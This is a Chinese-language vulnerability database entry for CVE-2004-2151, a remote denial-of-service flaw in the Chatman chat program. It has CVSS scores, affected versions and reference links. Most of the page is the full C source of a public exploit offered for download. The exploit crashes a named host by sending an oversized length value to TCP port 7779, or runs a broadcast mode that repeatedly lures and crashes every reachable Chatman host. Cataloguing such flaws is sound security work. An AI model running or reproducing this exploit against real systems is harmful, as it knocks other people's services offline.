CVE-2004-2151
CVSS5.0
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:43:20
NMCOE    

[原文]Chatman 1.1.1 RC1 and earlier allows remote attackers to cause a denial of service (memory consumption or application crash) via a very large data size.


[CNNVD]Virtual Projects Chatma拒绝服务漏洞(CNNVD-200412-287)

        Chatman 1.1.1 RC1及其以前的版本存在漏洞。远程攻击者借助超大的数据型号导致服务拒绝(内存消耗或者应用程序崩溃)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:virtual_projects:chatman:1.1.5_beta
cpe:/a:virtual_projects:chatman:1.0.3_beta
cpe:/a:virtual_projects:chatman:1.0.4_beta
cpe:/a:virtual_projects:chatman:1.1.3_beta
cpe:/a:virtual_projects:chatman:1.0.1_beta
cpe:/a:virtual_projects:chatman:1.0.2_beta
cpe:/a:virtual_projects:chatman:1.1.2_beta
cpe:/a:virtual_projects:chatman:1.3.0_beta
cpe:/a:virtual_projects:chatman:1.1.0_beta
cpe:/a:virtual_projects:chatman:1.2.1_beta
cpe:/a:virtual_projects:chatman:1.4.0_beta
cpe:/a:virtual_projects:chatman:1.5.1
cpe:/a:virtual_projects:chatman:1.1.4_beta
cpe:/a:virtual_projects:chatman:1.5.0_rc1
cpe:/a:virtual_projects:chatman:1.1.1_beta
cpe:/a:virtual_projects:chatman:1.3.1_beta

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2151
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2151
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-287
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/11263
(UNKNOWN)  BID  11263
http://www.securityfocus.com/archive/1/376569
(VENDOR_ADVISORY)  BUGTRAQ  20040927 Broadcast crash in Chatman 1.5.1 RC1
http://securitytracker.com/id?1011431
(UNKNOWN)  SECTRACK  1011431
http://secunia.com/advisories/12665/
(VENDOR_ADVISORY)  SECUNIA  12665
http://xforce.iss.net/xforce/xfdb/17513
(UNKNOWN)  XF  chatman-dos(17513)
http://www.osvdb.org/10365
(UNKNOWN)  OSVDB  10365

- 漏洞信息

Virtual Projects Chatma拒绝服务漏洞
中危 其他
2004-12-31 00:00:00 2006-10-30 00:00:00
远程  
        Chatman 1.1.1 RC1及其以前的版本存在漏洞。远程攻击者借助超大的数据型号导致服务拒绝(内存消耗或者应用程序崩溃)。

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (606)

Chatman <= 1.5.1 RC1 Broadcast Crash Exploit (EDBID:606)
windows dos
2004-03-01 Verified
0 Luigi Auriemma
N/A [点击下载]
/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
    #include <winsock.h>
#include <string.h>
#include <errno.h>



void std_err(void) {
    char    *error;

    switch(WSAGetLastError()) {
        case 10004: error = "Interrupted system call"; break;
        case 10009: error = "Bad file number"; break;
        case 10013: error = "Permission denied"; break;
        case 10014: error = "Bad address"; break;
        case 10022: error = "Invalid argument (not bind)"; break;
        case 10024: error = "Too many open files"; break;
        case 10035: error = "Operation would block"; break;
        case 10036: error = "Operation now in progress"; break;
        case 10037: error = "Operation already in progress"; break;
        case 10038: error = "Socket operation on non-socket"; break;
        case 10039: error = "Destination address required"; break;
        case 10040: error = "Message too long"; break;
        case 10041: error = "Protocol wrong type for socket"; break;
        case 10042: error = "Bad protocol option"; break;
        case 10043: error = "Protocol not supported"; break;
        case 10044: error = "Socket type not supported"; break;
        case 10045: error = "Operation not supported on socket"; break;
        case 10046: error = "Protocol family not supported"; break;
        case 10047: error = "Address family not supported by protocol family"; break;
        case 10048: error = "Address already in use"; break;
        case 10049: error = "Can't assign requested address"; break;
        case 10050: error = "Network is down"; break;
        case 10051: error = "Network is unreachable"; break;
        case 10052: error = "Net dropped connection or reset"; break;
        case 10053: error = "Software caused connection abort"; break;
        case 10054: error = "Connection reset by peer"; break;
        case 10055: error = "No buffer space available"; break;
        case 10056: error = "Socket is already connected"; break;
        case 10057: error = "Socket is not connected"; break;
        case 10058: error = "Can't send after socket shutdown"; break;
        case 10059: error = "Too many references, can't splice"; break;
        case 10060: error = "Connection timed out"; break;
        case 10061: error = "Connection refused"; break;
        case 10062: error = "Too many levels of symbolic links"; break;
        case 10063: error = "File name too long"; break;
        case 10064: error = "Host is down"; break;
        case 10065: error = "No Route to Host"; break;
        case 10066: error = "Directory not empty"; break;
        case 10067: error = "Too many processes"; break;
        case 10068: error = "Too many users"; break;
        case 10069: error = "Disc Quota Exceeded"; break;
        case 10070: error = "Stale NFS file handle"; break;
        case 10091: error = "Network SubSystem is unavailable"; break;
        case 10092: error = "WINSOCK DLL Version out of range"; break;
        case 10093: error = "Successful WSASTARTUP not yet performed"; break;
        case 10071: error = "Too many levels of remote in path"; break;
        case 11001: error = "Host not found"; break;
        case 11002: error = "Non-Authoritative Host not found"; break;
        case 11003: error = "Non-Recoverable errors: FORMERR, REFUSED, NOTIMP"; break;
        case 11004: error = "Valid name, no data record of requested type"; break;
        default: error = strerror(errno); break;
    }
    fprintf(stderr, "\nError: %s\n", error);
    exit(1);
}


    #define close   closesocket
    #define ONESEC  1000
    #define TWAIT   30000
    DWORD   tid1;
    HANDLE  thandle;
    #define launch_thread(FUNCTION, PARAMETER) \
        thandle = CreateThread(NULL, 0, (void *)&FUNCTION, (void *)PARAMETER, 0, &tid1); \
        if(!thandle)
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>
    #include <netinet/in.h>
    #include <pthread.h>

    #define ONESEC  1
    #define TWAIT   30
    pthread_t   tid1;
    int         thandle;
    #define launch_thread(FUNCTION, PARAMETER) \
        thandle = pthread_create(&tid1, NULL, (void *)&FUNCTION, (void *)PARAMETER); \
        if(thandle)
#endif



#define VER     "0.1"
#define PORT    7779
#define JOIN    "/TS\r" "crash"
#define BOOM    "\x00\x00\x00\x7f"
    // the cause of the bug is a too big 32 bit value
    // so the allocation fails and the host exits
    // note, are made some operations on this number
    // by the target host


#ifdef WIN32
    DWORD WINAPI broadjoin(void);
    DWORD WINAPI client(int sock);
#else
    void *broadjoin(void);
    void *client(int sock);
#endif
u_long resolv(char *host);
void std_err(void);



u_long  broadip = 0xffffffffL;



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            sa,
            type,
            on = 1,
            psz;


    setbuf(stdout, NULL);

    fputs("\n"
        "Chatman <= 1.5.1 RC1 broadcast crash "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@altervista.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <d/p> [host]\n"
            "\n"
            "d = direct, you must specify the host to crash\n"
            "    Example: %s d localhost\n"
            "p = passive broadcast crash, any Chatman host reacheable by 255.255.255.255\n"
            "    (or any other address choosen by you) will be passively crashed.\n"
            "    Examples: %s p\n"
            "              %s p 227.0.0.2\n"
            "              %s p 127.0.0.1\n"
            "\n", argv[0], argv[0], argv[0], argv[0], argv[0]);
        exit(1);
    }

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    type = argv[1][0];
    if((type != 'd') && (type != 'p')) {
        fputs("\nError: You must choose between 'd' or 'p'\n", stdout);
        exit(1);
    }

    if(type == 'd') {
        if(argc < 3) {
            fputs("\nError: you must specify the host to crash\n", stdout);
            exit(1);
        }
        peer.sin_addr.s_addr = resolv(argv[2]);
        printf("- target   %s:%hu\n",
            inet_ntoa(peer.sin_addr),
            PORT);
    } else {
        if(argc > 2) broadip = resolv(argv[2]);
        peer.sin_addr.s_addr = INADDR_ANY;
        psz                  = sizeof(peer);
        printf("- target   %s (UDP %d, bind %d)\n",
            inet_ntoa(*(struct in_addr *)&broadip),
            PORT - 1,
            PORT);
    }
    peer.sin_port   = htons(PORT);
    peer.sin_family = AF_INET;

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();

    if(type == 'd') {
        if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
          < 0) std_err();

        fputs("- send BOOM data\n", stdout);
        if(send(sd, BOOM, sizeof(BOOM) - 1, 0)
          < 0) std_err();
        fputs("- the host should be crashed, check it manually\n", stdout);

    } else {
        fputs(
            "- launch the broad ping, the tool will automatically and passively crash any\n"
            "  vulnerable Chatman host each 30 seconds (so it runs infinitely until you\n"
            "  stop it).\n", stdout);

        launch_thread(broadjoin, NULL) {
            fputs("\nError: Cannot create the thread\n", stdout);
            exit(1);
        }

        fputs("- bind TCP port to accept connections to crash hosts\n", stdout);
    	if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
    	  < 0) std_err();
        if(bind(sd, (struct sockaddr *)&peer, sizeof(peer))
    	  < 0) std_err();
        if(listen(sd, 5)
          < 0) std_err();

        for(;;) {
            sa = accept(sd, (struct sockaddr *)&peer, &psz);
            if(sa < 0) std_err();

            printf("Host %s:%hu -> BOOM\n",
                inet_ntoa(peer.sin_addr),
                ntohs(peer.sin_port));

            launch_thread(client, sa) {
                fputs("\nError: Cannot create the thread\n", stdout);
                exit(1);
            }
        }
    }

    close(sd);
    return(0);
}



#ifdef WIN32
    DWORD WINAPI broadjoin(void) {
#else
    void *broadjoin(void) {
#endif
    int                 sd,
                        on = 1;
    struct  sockaddr_in peer;

    peer.sin_addr.s_addr = broadip;
    peer.sin_port        = htons(PORT - 1); // 7778
    peer.sin_family      = AF_INET;

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    if(setsockopt(sd, SOL_SOCKET, SO_BROADCAST, (char *)&on, sizeof(on))
      < 0) std_err();

    fputs("- send broadcast UDP join packet (each 30 seconds)\n", stdout);

    for(;;) {
        if(sendto(sd, JOIN, sizeof(JOIN) - 1, 0, (struct sockaddr *)&peer, sizeof(peer))
          < 0) std_err();
        fputs(".\n", stdout);
        sleep(TWAIT);
    }

    close(sd);
    return(0);
}



#ifdef WIN32
    DWORD WINAPI client(int sock) {
#else
    void *client(int sock) {
#endif
    if(send(sock, BOOM, sizeof(BOOM) - 1, 0)
      < 0) std_err();
    sleep(ONESEC);  // needed!
    close(sock);
    return(0);
}



u_long resolv(char *host) {
    struct  hostent *hp;
    u_long  host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolve hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_long *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif

// milw0rm.com [2004-03-01]
		

- 漏洞信息

10365
Virtual Project's ChatMan Large Packet DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

ChatMan contains a flaw that may allow a remote denial of service. The issue is triggered when an overly large data packet occurs, and will result in loss of availability for the service.

- 时间线

2004-09-27 2004-09-27
2004-09-27 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站